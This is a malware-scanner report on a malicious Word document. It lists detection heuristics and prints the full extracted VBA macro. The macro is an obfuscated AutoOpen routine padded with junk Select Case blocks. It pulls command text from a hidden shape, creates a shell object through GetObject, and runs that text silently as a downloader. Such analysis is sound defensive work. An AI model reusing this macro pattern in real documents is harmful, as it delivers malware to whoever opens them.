MALICIOUS
232
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample contains a VBA macro with an AutoOpen function that attempts to execute a command-line payload. This payload is heavily obfuscated but appears to be designed to download and execute additional stages from various URLs. The presence of cmd.exe invocation and the structure of the script strongly suggest a downloader or dropper functionality.
Heuristics 9
-
ClamAV: Doc.Malware.Sagent-6813871-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Sagent-6813871-0
-
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
End Select Set ndKtkQv = GetObject(aViNGFjH + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + jfwqG) On Error Resume Next -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5742 bytes |
SHA-256: aedacd7e282f64b6d7178c16f25db2287c8439c417be4c9358a02ef71a877310 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
91 of 147 identifiers look randomly generated (e.g. 'jXVvYtOSvkzz') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "jXVvYtOSvkzz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case vHbqjzq
Case 302725929
QiIZwh = 261928046
HUFwnG = CLng(166584178)
Case 280890079
wYrcCtjn = Oct(tvfoq)
UifKuV = FjzaR
Case 21230282
IACzrBS = CDate(nOoYm)
oriSdoiI = Int(179586883 * wSsSKf)
End Select
On Error Resume Next
Select Case jdBWRTp
Case 116921515
ATGcYh = 341377692
jfJdHbV = CLng(276448663)
Case 74708770
wZlhPtdp = Oct(zVqSWaP)
cravHpni = jwbBjjG
Case 204895382
raTEMzjCC = CDate(tMnDs)
twksrkww = Int(245725438 * jNdRo)
End Select
On Error Resume Next
Select Case OmfRiG
Case 97475170
haLwF = 188657891
qhBTj = CLng(297233802)
Case 271834843
dqRPLFN = Oct(MLzoj)
GGIuXZusX = qBqEvv
Case 185280007
YOCbNrD = CDate(TQwmGobAa)
KmVPdkSAZ = Int(65111219 * IORjYP)
End Select
Set ftRqbGiu = Shapes("pOlvcnLMEQjF")
On Error Resume Next
Select Case vubMiddQi
Case 230556574
stKAlaaWu = 63475444
hoCIN = CLng(120094517)
Case 190011316
YUswwOXi = Oct(NtTuvOmAJ)
vvwKF = nNmKaQLn
Case 270736379
iAvMlN = CDate(aIBqNmaPH)
LhtbJ = Int(258912727 * KBkUZ)
End Select
On Error Resume Next
Select Case MkZYZGki
Case 166386747
BOZTv = 240781802
XUpkm = CLng(113599619)
Case 170814409
SQGIFB = Oct(MdYRKEC)
bklzAdCiK = wXlSz
Case 175220290
zEGqda = CDate(IYBwvi)
zUZOzAR = Int(170097540 * PhvBJiqui)
End Select
On Error Resume Next
Select Case XwlnEvP
Case 244736724
NtTop = 846523
wirmJs = CLng(176322135)
Case 180900483
iNSDwCDRn = Oct(jdLTZBE)
NEzUFPD = wmDUiV
Case 64366555
WiwhLKqBA = CDate(QokLRl)
TNWzN = Int(49577694 * AjGQO)
End Select
ujJbDvPR = "" + TUzrFX + OvUqw + lVRQLIm + ftRqbGiu.TextFrame.TextRange.Text + athfD + hTCUQNaj + JIEsQ + AUvwCjF
On Error Resume Next
Select Case zAKUiGCo
Case 161882589
XuBRJ = 110841253
mwGbw = CLng(237881028)
Case 115353838
joJrJPfEu = Oct(djKFrkzA)
wwXsK = zHKkKwQt
Case 195538711
RswOqsqHf = CDate(kzjHVbzj)
tJvzMMI = Int(140591649 * knMmjI)
End Select
On Error Resume Next
Select Case wSjfh
Case 244841668
VKziCVkJo = 117201747
zunYS = CLng(277456066)
Case 340572131
PVFri = Oct(EdfFcn)
BBNKUdfz = rzKHzZQ
Case 168417067
tfcVW = CDate(TONzrE)
LiXvs = Int(170877653 * zMTHui)
End Select
Set ndKtkQv = GetObject(aViNGFjH + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + jfwqG)
On Error Resume Next
Select Case FnrDSXPb
Case 120137855
JHUoTOmL = 244161218
UzAllzb = CLng(135077707)
Case 48915476
waciK = Oct(kUYYVZL)
MtVci = IrRTR
Case 49447877
FRVwvUOr = CDate(fpiuiSmM)
umzYs = Int(183938782 * qzvFJJNCm)
End Select
On Error Resume Next
Select Case zdJfUlcXE
Case 289920356
VbdaV = 129466248
iiBmuwvw = CLng(331496348)
Case 95127897
UamuLClZ = Oct(LDNPq)
tjisiflN = CvLjM
Case 236787184
mOmjRPa = CDate(bpvOWf)
mvHDOT = Int(38142965 * GjNfsPrC)
End Select
Const NRsBilV = 0
On Error Resume Next
Select Case HHcbC
Case 341665938
jUwFStYN = 219853738
BiJNS = CLng(333961959)
Case 174234950
kOwsjKpf = Oct(atHLjsti)
MiUfisHsU = OppIBmSl
Case 283045593
kmQmMwUZq = CDate(mPjTmrU)
fElrp = Int(54604621 * rkkGZN)
End Select
ndKtkQv.Run@ ujJbDvPR, NRsBilV
On Error Resume Next
Select Case IzAPhTdJM
Case 326335513
oOkrPlK = 103001967
kdcKGC = CLng(23139221)
Case 38783127
BlwWWIIiz = Oct(miPbnY)
pFzwiZzCL = WpIiQXO
Case 70413592
YRrbik = CDate(wdbVCpmO)
zGwTLw = Int(127388358 * dmoojV)
End Select
On Error Resume Next
Select Case BFkuSDu
Case 223818561
aabRjUS = 307904585
OKVqSS = CLng(33886513)
Case 15298314
bkSRwGLwq = Oct(FtEWmM)
KNznVQiR = hzKmSp
Case 105026759
SzHJi = CDate(FjdGpXJ)
jdfHrELG = Int(130599209 * AiYMlEsQ)
End Select
On Error Resume Next
Select Case wGdiw
Case 29005930
iSSHqKmVl = 312477297
GSvPAvIVJ = CLng(28555733)
Case 235332298
zmzTUCSSw = Oct(bfGbBtjlh)
DNAwOjFhV = vtwUSUt
Case 284134565
SSdBNq = CDate(JZtOlX)
tulmAFl = Int(317965065 * wVwihlIh)
End Select
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.